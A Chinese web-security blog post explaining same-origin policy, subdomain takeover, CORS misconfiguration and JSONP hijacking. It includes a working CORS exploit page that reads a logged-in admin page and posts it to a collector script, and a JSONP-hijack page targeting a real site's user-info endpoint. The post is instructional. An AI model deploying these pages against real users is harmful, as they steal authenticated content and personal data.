<!DOCTYPE html><html lang="zh-CN" data-theme="light"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>子域名接管&amp;COSP跨域资源&amp;JSONP跨域回调 | 秋刀鱼</title><noscript>开启JavaScript才能访问本站哦~</noscript><link rel="icon" href="https://pic.imgdb.cn/item/65f1415f9f345e8d03452fbe.jpg"><!-- index.css--><link rel="stylesheet" href="/css/index.css?v=1.5.1"><!-- inject head--><link rel="stylesheet" href="https://cdn.cbd.int/solitude-source/icon/scoicon.min.css"><link rel="stylesheet" href="https://cdn.staticfile.org/node-snackbar/0.1.16/snackbar.min.css"><!-- aplayer--><link rel="stylesheet" href="https://cdn.staticfile.org/aplayer/1.10.1/APlayer.min.css"><!-- swiper--><!-- Open Graph--><meta name="description" content="前置知识同源策略-同源策略(SOP)-“同源”包括三个条件：同协议 同域名 同端口同源策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制.简单说就是浏览器的一种安全策略。虽然同源策略在安全方面起到了很好的防护作用,但也在一定程度上限制了一些前"><!-- pwa--><script>(win => {
        win.saveToLocal = {
            set: function setWithExpiry(key, value, ttl) {
                if (ttl === 0)
                    return
                const now = new Date()
                const expiryDay = ttl * 86400000
                const item = {
                    value: value,
                    expiry: now.getTime() + expiryDay,
                }
                localStorage.setItem(key, JSON.stringify(item))
            },

            get: function getWithExpiry(key) {
                const itemStr = localStorage.getItem(key)

                if (!itemStr) {
                    return undefined
                }
                const item = JSON.parse(itemStr)
                const now = new Date()

                if (now.getTime() > item.expiry) {
                    localStorage.removeItem(key)
                    return undefined
                }
                return item.value
            }
        }

        const DarkModeStatus = localStorage.getItem('theme')
        if (DarkModeStatus !== null) {
            if (DarkModeStatus === 'dark') {
                document.documentElement.setAttribute('data-theme', 'dark')
            } else {
                document.documentElement.setAttribute('data-theme', 'light')
            }
        }

        const asideStatus = saveToLocal.get('aside-status')
        if (asideStatus !== undefined) {
            if (asideStatus === 'hide') {
                document.documentElement.classList.add('hide-aside')
            } else {
                document.documentElement.classList.remove('hide-aside')
            }
        }
    }
)(window)

console.log(
    "%c Program: Hexo %c Theme: Hexo-Theme-Solitude %c Version: v1.5.1",
    "border-radius:5px 0 0 5px;padding: 5px 10px;color:white;background:#ff3842;margin:10px 0",
    "padding: 5px 10px;color:white;background:#3e9f50;",
    "border-radius:0 5px 5px 0;padding: 5px 10px;background:#0084ff;"
);</script><!-- global head--><script>const GLOBAL_CONFIG = {
    root: '/',
    algolia: undefined,
    localsearch: {"preload":false,"path":"/search.xml"},
    runtime: '2022-10-01 00:00:00',
    lazyload: {
        enable: false,
        error: '/img/error_load.png'
    },
    hightlight: {
        enable: true,
        limit: 200,
        expand: true,
        copy: true,
    },
    randomlinks: false,
    lang: {
        theme: {
            dark: '已切换至深色模式',
            light: '已切换至浅色模式',
        },
        copy: {
            success: '复制成功',
            error: '复制失败',
        },
        backtop: '返回顶部',
        time: {
            recent: '最近',
            yesterday: '昨天',
            berforeyesterday: '前天',
            daybefore: '天前',
            runtime: '天',
        },
        search: {
            empty: '找不到你查询的内容：${query}',
            hit: '找到 ${hits} 条结果，用时 ${time} 毫秒',
            placeholder: '输入关键词快速查找',
        },
        chs: {
            chs_to_cht: '繁體中文',
            cht_to_chs: '简体中文',
        }
    },
    aside: {
        sayhello: {
            morning: '一日之计在于晨',
            noon: '吃饱了才有力气干活',
            afternoon: '集中精力，攻克难关',
            night: '不要太劳累了，早睡更健康',
            goodnight: '睡个好觉，保证精力充沛',
        },
        sayhello2: ["🤖️ 数码科技爱好者","🔍 分享与热心帮助","🏠 智能家居小能手","🔨 设计开发一条龙","🤝 专修交互与设计","🏃 脚踏实地行动派","🧱 团队小组发动机","💢 壮汉人狠话不多","🎮 电竞游戏爱好者"],
    },
    covercolor: {
        enable: false
    },
    comment: {
        enable: false,
        type: '',
        commentBarrage: false,
        randomInfoStart: ["聪敏的","可爱的","美丽的"],
        randomInfoEnd: ["白菜","小可爱","小仙女"],
        twikoo: {
            url: '',
            accessToken: ''
        },
        waline: {
            url: '',
        }
    },
    lightbox: 'mediumZoom',
    rightside: {
        enable: false
    },
    ai: {
        enable: false,
        key: '',
        talk: '我是王卓Sco开发的摘要生成助理ScoGPT，ScoGPT在静态部署时进行摘要的撰写，并且在访客访问时通过ScoCorrection转译后的文本摘要实现工具。我在这里只负责已经生成的摘要显示，你无法与我直接沟通，但我可以回答一些预设的问题。',
        randomPost: false,
    },
    music: {
        enable: true,
    },
    translate: undefined,
};</script><meta name="generator" content="Hexo 7.1.0"></head><body id="body"><!-- universe--><canvas id="universe"></canvas><!-- loading--><!-- console--><div id="console"><div class="close-btn" onclick="sco.hideConsole()"><i class="scoicon sco-close-fill"></i></div><div class="button-group"><div class="console-btn-item"><a class="darkmode_switchbutton" onclick="sco.switchDarkMode()" title="昼夜切换" href="javascript:void(0);"><i class="scoicon sco-moon-clear-fill"></i></a></div><div class="console-btn-item" id="consoleHideAside"><a class="asideSwitch" onclick="sco.switchHideAside()" title="边栏显示控制" href="javascript:void(0);"><i class="scoicon sco-side-bar-fill"></i></a></div><div class="console-btn-item" id="consoleMusic" onclick="sco.musicToggle()"><a class="music-switch" title="音乐开关" href="javascript:void(0);"><i class="scoicon sco-disc-fill"></i></a></div></div><div class="console-mask" onclick="sco.hideConsole()"></div></div><!-- sidebar--><div id="sidebar" style="zoom: 1;"><div id="menu-mask" style="display: none;"></div><div id="sidebar-menus"><span class="sidebar-menu-item-title">功能</span><div class="sidebar-menu-item"><a class="darkmode_switchbutton menu-child" onclick="sco.switchDarkMode()" href="javascript:void(0);"><i class="scoicon sco-moon-clear-fill"></i><span>显示模式</span></a></div><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><span>首页</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>文库</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/archives/"><i class="scoicon  sco-folder-fill"></i><span>文章列表</span></a></li><li><a class="site-page child" href="/categories/"><i class="scoicon  sco-checkbox-multiple-blank-fill"></i><span>全部分类</span></a></li><li><a class="site-page child" href="/tags/"><i class="scoicon  sco-price-tag-fill"></i><span>全部标签</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>我的</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/tlink/"><i class="scoicon  sco-tools-fill"></i><span>工具箱</span></a></li><li><a class="site-page child" href="/music/"><i class="scoicon  sco-disc-fill"></i><span>音乐馆</span></a></li></ul></div></div><span class="sidebar-menu-item-title">标签</span><div class="card-widget card-tags card-archives card-webinfo card-allinfo"><div class="card-tag-cloud"><a href="/tags/%E5%88%9D%E7%A2%B0Android/">初碰Android<sup>3</sup></a><a href="/tags/Blue-Team/">Blue-Team<sup>2</sup></a><a href="/tags/%E5%BA%94%E6%80%A5%E5%93%8D%E5%BA%94/">应急响应<sup>1</sup></a><a href="/tags/CMD/">CMD<sup>1</sup></a><a href="/tags/django/">django<sup>25</sup></a><a href="/tags/Python%E5%85%A5%E9%97%A8/">Python入门<sup>12</sup></a><a href="/tags/%E6%8E%A5%E5%8F%A3%E6%B5%8B%E8%AF%95/">接口测试<sup>1</sup></a><a href="/tags/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/">基础漏洞<sup>15</sup></a><a href="/tags/Crawl/">Crawl<sup>1</sup></a><a href="/tags/WAF%E7%BB%95%E8%BF%87/">WAF绕过<sup>1</sup></a><a href="/tags/%E5%AD%A6%E4%B9%A0%E8%B7%AF%E7%BA%BF/">学习路线<sup>2</sup></a><a href="/tags/record/">record<sup>4</sup></a><a href="/tags/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8/">内网安全<sup>7</sup></a><a href="/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7/">安全工具<sup>10</sup></a><a href="/tags/PC%E5%AE%A2%E6%88%B7%E7%AB%AF/">PC客户端<sup>2</sup></a><a href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/">权限提升<sup>4</sup></a><a href="/tags/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/">漏洞复现<sup>10</sup></a><a href="/tags/%E4%BF%A1%E6%81%AF%E6%94%B6%E9%9B%86/">信息收集<sup>1</sup></a></div></div></div></div><!-- keyboard--><div class="post" id="body-wrap"><header class="post-bg" id="page-header"><nav class="show" id="nav"><div id="nav-group"><div id="blog_name"><a id="site-name" href="/" title="返回博客主页"><span class="title">秋刀鱼</span></a></div><div id="page-name-mask"><div id="page-name"><a id="page-name-text" onclick="sco.toTop()">子域名接管&amp;COSP跨域资源&amp;JSONP跨域回调</a></div></div><div id="menus"><div class="menus_items"><div class="menus_item"><a class="site-page" href="/"><span>首页</span></a></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>文库</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/archives/"><i class="scoicon  sco-folder-fill"></i><span>文章列表</span></a></li><li><a class="site-page child" href="/categories/"><i class="scoicon  sco-checkbox-multiple-blank-fill"></i><span>全部分类</span></a></li><li><a class="site-page child" href="/tags/"><i class="scoicon  sco-price-tag-fill"></i><span>全部标签</span></a></li></ul></div><div class="menus_item"><a class="site-page" href="javascript:void(0);"><span>我的</span></a><ul class="menus_item_child"><li><a class="site-page child" href="/tlink/"><i class="scoicon  sco-tools-fill"></i><span>工具箱</span></a></li><li><a class="site-page child" href="/music/"><i class="scoicon  sco-disc-fill"></i><span>音乐馆</span></a></li></ul></div></div></div><div id="nav-left"></div><div id="nav-right"><div class="nav-button" id="travellings_button"><a class="site-page" target="_blank" rel="noopener" href="https://www.travellings.cn/go.html" title=""><i class="scoicon sco-train-line"></i></a></div><div class="nav-button" id="randomPost_button"><a class="site-page" onclick="toRandomPost()" title="随机一篇文章" href="javascript:void(0);"><i class="scoicon sco-signal-tower-fill"></i></a></div><div class="nav-button" id="search-button"><a class="site-page social-icon search" href="javascript:void(0);" title="搜索"><i class="scoicon sco-search-line"></i></a></div><div class="nav-button" id="nav-totop" onclick="sco.toTop()"><a class="totopbtn"><i class="scoicon sco-arrow-up-line"></i><span id="percent">0</span></a></div><div id="toggle-menu"><a class="site-page"><i class="scoicon sco-menu-line"></i></a></div></div></div></nav><div class="coverdiv" id="coverdiv"><img class="nolazyload" id="post-cover" src="https://w.wallhaven.cc/full/vq/wallhaven-vq3838.png" alt="子域名接管&amp;COSP跨域资源&amp;JSONP跨域回调"></div><div id="post-info"><div id="post-firstinfo"><div class="meta-firstline"><a class="post-meta-original" title="该文章为原创文章，注意版权协议">原创</a><span class="post-meta-categories"><a class="post-meta-categories" href="/categories/Web安全/">Web安全</a></span><div class="tag_share"><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/%E5%9F%BA%E7%A1%80%E6%BC%8F%E6%B4%9E/"><span class="tags-name tags-punctuation">基础漏洞</span></a></div></div></div></div><h1 class="post-title">子域名接管&amp;COSP跨域资源&amp;JSONP跨域回调</h1><div id="post-meta"><div class="meta-secondline"><span class="post-meta-wordcount"><i class="post-meta-icon scoicon sco-word-fill" title="文章字数"></i><span class="word-count">2.4k</span><span class="post-meta-separator"></span></span><a class="post-meta-pv" href="/2023/11/30/Web%E6%BC%8F%E6%B4%9E/%E5%AD%90%E5%9F%9F%E5%90%8D%E6%8E%A5%E7%AE%A1&amp;COSP%E8%B7%A8%E5%9F%9F%E8%B5%84%E6%BA%90&amp;JSONP%E8%B7%A8%E5%9F%9F%E5%9B%9E%E8%B0%83/" title="文章热度"><i class="post-meta-icon scoicon sco-fire-fill"></i><span id="busuanzi_value_page_pv"><i class="scoicon sco-loading-line"></i></span></a></div></div></div><section class="main-hero-waves-area waves-area"><svg class="waves-svg" xmlns="http://www.w3.org/2000/svg" xlink="http://www.w3.org/1999/xlink" viewBox="0 24 150 28" preserveAspectRatio="none" shape-rendering="auto"><defs><path id="gentle-wave" d="M -160 44 c 30 0 58 -18 88 -18 s 58 18 88 18 s 58 -18 88 -18 s 58 18 88 18 v 44 h -352 Z"></path></defs><g class="parallax"><use href="#gentle-wave" x="48" y="0"></use><use href="#gentle-wave" x="48" y="3"></use><use href="#gentle-wave" x="48" y="5"></use><use href="#gentle-wave" x="48" y="7"></use></g></svg></section></header><main class="layout" id="content-inner"><div id="post"><article class="post-content" id="article-container"><p><img src="/../../imgs/image-20240101153807552.png" alt="image-20240101153807552"></p>
<h4 id="前置知识"><a href="#前置知识" class="headerlink" title="前置知识"></a>前置知识</h4><h5 id="同源策略"><a href="#同源策略" class="headerlink" title="同源策略"></a>同源策略</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">-同源策略(SOP)-“同源”包括三个条件：同协议 同域名 同端口</span><br><span class="line">同源策略限制从一个源加载的文档或脚本与来自另一个源的资源进行交互,这是一个用于隔离潜在恶意文件的关键的安全机制.简单说就是浏览器的一种安全策略。</span><br><span class="line">虽然同源策略在安全方面起到了很好的防护作用,但也在一定程度上限制了一些前端功能的实现,所以就有了许多跨域的手段。</span><br><span class="line"></span><br><span class="line">http://www.xiaodi8.com</span><br><span class="line">不属于同源：</span><br><span class="line">https://www.xiaodi8.com</span><br><span class="line">http://www.xiaodi9.com</span><br><span class="line">http://www.xiaodi8.com:81</span><br><span class="line">属于同源：</span><br><span class="line">http://www.xiaodi8.com/xiaodi</span><br></pre></td></tr></table></figure>

<h5 id="子域名接管"><a href="#子域名接管" class="headerlink" title="子域名接管"></a>子域名接管</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">域名解析记录指向域名，对应主机指向了一个当前未在使用或已经删除的特定服务，攻击者通过注册指向域名，从而控制当前域名的控制权，实现恶意软件分发、网络钓鱼/鱼叉式网络钓鱼、XSS 、身份验证绕过等。子域名接管不仅仅限于CNAME记录，NS,MX甚至A记录也会受到影响。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">检测项目：</span><br><span class="line">https://github.com/pwnesia/dnstake</span><br><span class="line">https://github.com/anshumanbh/tko-subs</span><br><span class="line">https://github.com/mhmdiaa/second-order</span><br><span class="line">https://github.com/r3curs1v3-pr0xy/sub404</span><br><span class="line">https://github.com/Echocipher/Subdomain-Takeover</span><br></pre></td></tr></table></figure>

<h5 id="COSP跨域资源"><a href="#COSP跨域资源" class="headerlink" title="COSP跨域资源"></a>COSP跨域资源</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">CORS全称Cross-Origin Resource Sharing, 跨域资源共享，是HTML5的一个新特性，已被所有浏览器支持，跨域资源共享(CORS)是一种放宽同源策略的机制，它允许浏览器向跨源服务器，发出XMLHttpRequest请求，从而克服了AJAX只能同源使用的限制，以使不同的网站可以跨域获取数据。</span><br><span class="line"></span><br><span class="line">Access-Control-Allow-Origin：指定哪些域可以访问域资源。例如，如果requester.com想要访问provider.com的资源，那么开发人员可以使用此标头安全地授予requester.com对provider.com资源的访问权限。</span><br><span class="line"></span><br><span class="line">Access-Control-Allow-Credentials：指定浏览器是否将使用请求发送cookie。仅当allow-credentials标头设置为true时，才会发送Cookie。</span><br><span class="line"></span><br><span class="line">Access-Control-Allow-Methods：指定可以使用哪些HTTP请求方法（GET，PUT，DELETE等）来访问资源。此标头允许开发人员通过在requester.com请求访问provider.com的资源时，指定哪些方法有效来进一步增强安全性。</span><br><span class="line"></span><br><span class="line">检测项目：https://github.com/chenjj/CORScanner</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<h5 id="JSONP跨域回调"><a href="#JSONP跨域回调" class="headerlink" title="JSONP跨域回调"></a>JSONP跨域回调</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">JSONP跨域巧妙的利用了script标签能跨域的特点,实现了json的跨域传输。</span><br><span class="line"></span><br><span class="line">检测项目：手工审查元素筛选或Burp项目</span><br><span class="line">https://github.com/p1g3/JSONP-Hunter</span><br></pre></td></tr></table></figure>

<h4 id="案例演示"><a href="#案例演示" class="headerlink" title="案例演示"></a>案例演示</h4><h5 id="CORS资源跨域-敏感页面源码获取"><a href="#CORS资源跨域-敏感页面源码获取" class="headerlink" title="CORS资源跨域-敏感页面源码获取"></a>CORS资源跨域-敏感页面源码获取</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">复现步骤：</span><br><span class="line">1、本地搭建访问页面跨域调用URL</span><br><span class="line">2、受害者访问当前页面被资源共享</span><br><span class="line"></span><br><span class="line">原理：</span><br><span class="line">CORS（资源共享，建立在同源策略上）  只能做资源的获取</span><br><span class="line">用户A在登录自己的后台或者页面，这个时候访问呢了第三方的页面的第三方页面去请求这个后台或者页面的内容，用户A访问了页面即将后台页面的内容泄露了</span><br><span class="line"></span><br><span class="line">CSRF（如果有同源策略，那就会失效）操作添加用户</span><br><span class="line">用户A在登录自己的后台或者页面，这个时候访问呢了第三方的页面的第三方页面去请求这个后台或者页面的内容，用户A访问了页面即将执行这个数据包。</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">产生原因：</span><br><span class="line">index.php文件</span><br><span class="line">Access-Control-Allow-Orign:*(标识其他页面能获取此页面的资源)（有漏洞）</span><br><span class="line">Access-Control-Allow-Orign:http://www.xiaodi8.com(标识www.xiaodi8.com能获取此页面的资源，其他页面就不支持了。)（没有漏洞）</span><br><span class="line"></span><br><span class="line">找这种漏洞，就是找设置问题，看不到</span><br><span class="line">黑盒：Access-Control-Allow-Orign这个值是否设置后通过资源</span><br></pre></td></tr></table></figure>

<figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">在后台中博客是登录状态，http://127.0.0.1:8107/zb_system/admin/index.php</span><br><span class="line"></span><br><span class="line">然后这时候管理员不小心触发了访问连接http://127.0.0.1:8107/cors.html</span><br></pre></td></tr></table></figure>

<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">cors.html内容：</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">h1</span>&gt;</span>cors exploit<span class="tag">&lt;/<span class="name">h1</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="keyword">function</span> <span class="title function_">exploit</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="language-javascript">&#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> xhr1;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">var</span> xhr2;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">if</span>(<span class="variable language_">window</span>.<span class="property">XMLHttpRequest</span>)</span></span><br><span class="line"><span class="language-javascript">    &#123;</span></span><br><span class="line"><span class="language-javascript">        xhr1 = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span></span><br><span class="line"><span class="language-javascript">        xhr2 = <span class="keyword">new</span> <span class="title class_">XMLHttpRequest</span>();</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">else</span></span></span><br><span class="line"><span class="language-javascript">    &#123;</span></span><br><span class="line"><span class="language-javascript">        xhr1 = <span class="keyword">new</span> <span class="title class_">ActiveXObject</span>(<span class="string">&quot;Microsoft.XMLHTTP&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">        xhr2= <span class="keyword">new</span> <span class="title class_">ActiveXObject</span>(<span class="string">&quot;Microsoft.XMLHTTP&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    xhr1.<span class="property">onreadystatechange</span>=<span class="keyword">function</span>(<span class="params"></span>)</span></span><br><span class="line"><span class="language-javascript">    &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span>(xhr1.<span class="property">readyState</span> == <span class="number">4</span> &amp;&amp; xhr1.<span class="property">status</span> == <span class="number">200</span>) </span></span><br><span class="line"><span class="language-javascript">        &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> datas=xhr1.<span class="property">responseText</span>;</span></span><br><span class="line"><span class="language-javascript">            xhr2.<span class="title function_">open</span>(<span class="string">&quot;POST&quot;</span>,<span class="string">&quot;http://127.0.0.1:8107/cors1.php&quot;</span>,<span class="string">&quot;true&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            xhr2.<span class="title function_">setRequestHeader</span>(<span class="string">&quot;Content-type&quot;</span>,<span class="string">&quot;application/x-www-form-urlencoded&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">            xhr2.<span class="title function_">send</span>(<span class="string">&quot;z0=&quot;</span>+<span class="built_in">escape</span>(datas));      </span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript">    xhr1.<span class="title function_">open</span>(<span class="string">&quot;GET&quot;</span>,<span class="string">&quot;http://127.0.0.1:8107/zb_system/admin/index.php&quot;</span>,<span class="string">&quot;true&quot;</span>) </span></span><br><span class="line"><span class="language-javascript">    xhr1.<span class="property">withCredentials</span> = <span class="literal">true</span>;        </span></span><br><span class="line"><span class="language-javascript">    xhr1.<span class="title function_">send</span>();</span></span><br><span class="line"><span class="language-javascript">&#125;</span></span><br><span class="line"><span class="language-javascript"><span class="title function_">exploit</span>();</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">&lt;!---这个代码的意思是请求http://localhost:8107/zb_system/admin/index.php这个页面，把页面的内容发送给http://localhost:8107/cors1.php，cors1.php去接受这个页面资源。---&gt;</span></span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="code"><pre><span class="line">cors1.php内容：</span><br><span class="line">    </span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$file</span> = <span class="title function_ invoke__">fopen</span>(<span class="string">&quot;secrect.html&quot;</span>, <span class="string">&quot;w+&quot;</span>);</span><br><span class="line"><span class="variable">$res</span> = <span class="variable">$_POST</span>[<span class="string">&#x27;z0&#x27;</span>];</span><br><span class="line"><span class="title function_ invoke__">fwrite</span>(<span class="variable">$file</span>, <span class="variable">$res</span>);</span><br><span class="line"><span class="title function_ invoke__">fclose</span>(<span class="variable">$res</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>访问<a target="_blank" rel="noopener" href="http://127.0.0.1:8107/cors.html">http://127.0.0.1:8107/cors.html</a></p>
<p><img src="/../../imgs/202204181650241117742532.png" alt="1649118875974-417aa83a-73ee-4d35-9934-771f802c1589.png"></p>
<p>会在当前目录生成一个<code>secrect.html</code></p>
<p>然后这个<code>secrect.html</code>就是<a target="_blank" rel="noopener" href="http://localhost:8107/zb_system/admin/index.php%E9%A1%B5%E9%9D%A2%E7%9A%84%E8%B5%84%E6%BA%90%E3%80%82">http://localhost:8107/zb_system/admin/index.php页面的资源。</a></p>
<p>访问：<a target="_blank" rel="noopener" href="http://localhost:8107/secrect.html">http://localhost:8107/secrect.html</a></p>
<p><img src="/../../imgs/202204181650241124517451.png" alt="1649119217357-52b60f7c-b1c5-447e-b0d4-16ae24b92411.png"></p>
<h5 id="JSONP回调跨域-某牙个人信息泄露"><a href="#JSONP回调跨域-某牙个人信息泄露" class="headerlink" title="JSONP回调跨域-某牙个人信息泄露"></a>JSONP回调跨域-某牙个人信息泄露</h5><figure class="highlight plaintext"><table><tr><td class="code"><pre><span class="line">复现步骤：</span><br><span class="line">1、登录某牙找到回调有敏感信息</span><br><span class="line">2、本地搭建访问页面跨域调用URL</span><br><span class="line">3、访问本地页面可获取当前某牙信息</span><br><span class="line"></span><br><span class="line">产生原理：</span><br><span class="line">    支付接口</span><br><span class="line">    调用支付宝官方接口来判断是否支持成功</span><br><span class="line">    自己的网站域名是支付宝官方的域名吗？不是，属于不同源，不符合同源策略</span><br><span class="line"></span><br><span class="line">除了支付接口，类似的登录接口等一系列都是这种回调。</span><br><span class="line"></span><br><span class="line">大型网站这种同源策略有没有？（肯定有）</span><br><span class="line">看数据包里面哪些有回调，看数据包有没有回调信息，看回调里面的敏感信息进行获取。</span><br><span class="line"></span><br><span class="line">搜索callback，点击Preserve log</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241133723262.png" alt="1649121193236-2db24edc-37f7-4022-94c9-276bcafb4f93.png"></p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">在数据包中点击response（这个意思就是相当于访问了这个地址，然后有一些回调信息）</span><br><span class="line"></span><br><span class="line">当访问个人资料的时候：访问地址：https://user.huya.com/user/getUserInfo?callback=jQuery17205956628992364452_1649121318647&amp;uid=1259515769956</span><br><span class="line"></span><br><span class="line">回调信息：jQuery17205956628992364452_1649121318647(&#123;<span class="string">&quot;code&quot;</span>:200,<span class="string">&quot;data&quot;</span>:&#123;<span class="string">&quot;uid&quot;</span>:1259515769956,<span class="string">&quot;avatar&quot;</span>:<span class="string">&quot;https://huyaimg.msstatic.com/avatar/1098/f5/f1d0e63d36c8ce1eb1e428c6306173_180_135.jpg?1565133598&quot;</span>&#125;,<span class="string">&quot;message&quot;</span>:<span class="string">&quot;请求成功&quot;</span>&#125;)</span><br><span class="line"></span><br><span class="line">其中https://huyaimg.msstatic.com/avatar/1098/f5/f1d0e63d36c8ce1eb1e428c6306173_180_135.jpg?1565133598这个就是头像地址</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241146516699.png" alt="1649121426892-5e536ce7-75e4-4a02-8bfa-d9afee5954e8.png"></p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">把这个地址复制：https://user.huya.com/user/getUserInfo?callback=jQuery17205956628992364452_1649121318647&amp;uid=1259515769956</span><br><span class="line">构造一个html:</span><br><span class="line"></span><br><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">&quot;utf-8&quot;</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">title</span>&gt;</span>JSONP劫持测试<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"><span class="keyword">function</span> <span class="title function_">callbackFunction</span>(<span class="params">result</span>)</span></span><br><span class="line"><span class="language-javascript">        &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">alert</span>(result.<span class="property">avatar</span>);</span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript"></span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">&quot;text/javascript&quot;</span> <span class="attr">src</span>=<span class="string">&quot;https://user.huya.com/user/getUserInfo?callback=jQuery17205956628992364452_1649121318647&amp;uid=1259515769956&quot;</span>&gt;</span><span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br><span class="line"></span><br><span class="line">当有人去访问这个页面，这个页面可以放在任何网上上去，比如在本地访问，访问之后，就会有回显信息</span><br></pre></td></tr></table></figure>

<p><img src="/../../imgs/202204181650241154687625.png" alt="1649121728354-bd524157-881e-4ecd-b615-d1226af4f1ed.png"></p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line">这样就获取到了图像信息等（个人信息）</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">用户A浏览器访问过huya,baidu.youku这种页面</span><br><span class="line"></span><br><span class="line">攻击者：尝试去测试这些官方的回调页面（解决同源策略的安全问题）（不直接去请求有敏感信息的页面）</span><br><span class="line">自己搭建在网站上面去触发代码，只要用户A访问了页面，相当于用户A就触发了回调，解决了同源策略的防护问题</span><br><span class="line">从未得到了回调页面的内容</span><br><span class="line"></span><br><span class="line">对于官方来讲：来源使攻击者的网站，不合法，同源策略防护阻止</span><br><span class="line">回调第三方：官方认同的合法的，从哪里触发都可以了</span><br></pre></td></tr></table></figure>

